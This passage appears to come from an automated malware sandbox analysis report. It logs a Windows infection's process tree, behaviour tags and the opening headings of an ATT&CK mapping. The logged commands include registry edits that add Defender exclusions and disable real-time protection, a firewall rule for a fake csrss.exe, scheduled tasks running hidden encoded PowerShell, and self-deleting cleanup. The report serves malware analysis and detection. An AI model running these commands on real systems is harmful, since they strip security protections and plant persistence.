- - C:\Users\Admin\Pictures\nmNNzXaLg4wXxwjYAX3aGb98.exe
    "C:\Users\Admin\Pictures\nmNNzXaLg4wXxwjYAX3aGb98.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
  - - C:\Users\Admin\Pictures\nmNNzXaLg4wXxwjYAX3aGb98.exe
      "C:\Users\Admin\Pictures\nmNNzXaLg4wXxwjYAX3aGb98.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:1592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2248
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:1532
- - C:\Users\Admin\Pictures\3Bihw9xme2xYRgoU7XBPv7zZ.exe
    "C:\Users\Admin\Pictures\3Bihw9xme2xYRgoU7XBPv7zZ.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2176
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:2500
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\nsyD606.tmp
      C:\Users\Admin\AppData\Local\Temp\nsyD606.tmp
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:780
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsyD606.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:1092
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2328
- - C:\Users\Admin\Pictures\Gt5rsurptCjvilCERkFf7uzk.exe
    "C:\Users\Admin\Pictures\Gt5rsurptCjvilCERkFf7uzk.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:2656
- - C:\Users\Admin\Pictures\YpE68ZZqoIJtLFzcLDzwRo8I.exe
    "C:\Users\Admin\Pictures\YpE68ZZqoIJtLFzcLDzwRo8I.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\7zS2BF.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2400
    - - C:\Users\Admin\AppData\Local\Temp\7zS28B6.tmp\Install.exe
        
        .\Install.exe /gdidwDXwn "385118" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:2996
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:1104
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:2832
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:1904
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:2956
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:1484
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:1488
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2936
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gWVaAWrMU" /SC once /ST 13:48:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:2372
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gWVaAWrMU"
        6⤵
        
        PID:1112
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gWVaAWrMU"
        6⤵
        
        PID:2524
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 16:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\DbWflJW.exe\" Ik /iisite_idjNj 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1440
- - C:\Users\Admin\Pictures\qV0uup9P6YE8qzfGPR6IvK7O.exe
    "C:\Users\Admin\Pictures\qV0uup9P6YE8qzfGPR6IvK7O.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2432
- - C:\Users\Admin\Pictures\S5KV4yldRzQLMnJBD7trg9f5.exe
    "C:\Users\Admin\Pictures\S5KV4yldRzQLMnJBD7trg9f5.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:956

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240116164246.log C:\Windows\Logs\CBS\CbsPersist_20240116164246.cab
1⤵
- Drops file in Windows directory
PID:2984

C:\Windows\system32\taskeng.exe
taskeng.exe {1CAC8271-8B7C-4C45-B94B-2DD193B2022A} S-1-5-21-3427588347-1492276948-3422228430-1000:QVMRJQQO\Admin:Interactive:[1]
1⤵
PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2168
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1032

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17105219102095837127-147033830816637507921332351513134345052120501722291945047109"
1⤵
PID:2832

C:\Windows\system32\taskeng.exe
taskeng.exe {5058F126-A0D8-4999-946A-FE1847820306} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2572
- C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\DbWflJW.exe
  C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\DbWflJW.exe Ik /iisite_idjNj 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:3032
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gWHMKEfSC" /SC once /ST 04:19:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1644
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gWHMKEfSC"
    3⤵
    PID:328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gWHMKEfSC"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2648
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gXJhJQnVn" /SC once /ST 09:20:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2332
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gXJhJQnVn"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gXJhJQnVn"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2760
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2192
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1188
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\YYFeagcQEOcPvCau\PMMfqWdw\MZubNubqPVKooIsO.wsf"
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\YYFeagcQEOcPvCau\PMMfqWdw\MZubNubqPVKooIsO.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1880
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2164
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1624
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2536
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2392
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UrkGLyjigLRybTVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UrkGLyjigLRybTVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1628
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2316
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1228
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2800
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1216
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2088
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2292
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UrkGLyjigLRybTVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3016
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\UrkGLyjigLRybTVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2804
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3012
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1484
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2472
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YYFeagcQEOcPvCau" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2952
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gBrVsphIH" /SC once /ST 11:13:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2956
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gBrVsphIH"
    3⤵
    PID:2464

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1952

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:952

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
PID:2960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1489125710774431016-868905967123138933-183817665726888152319097026101381402601"
1⤵
- Windows security bypass
PID:1668

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

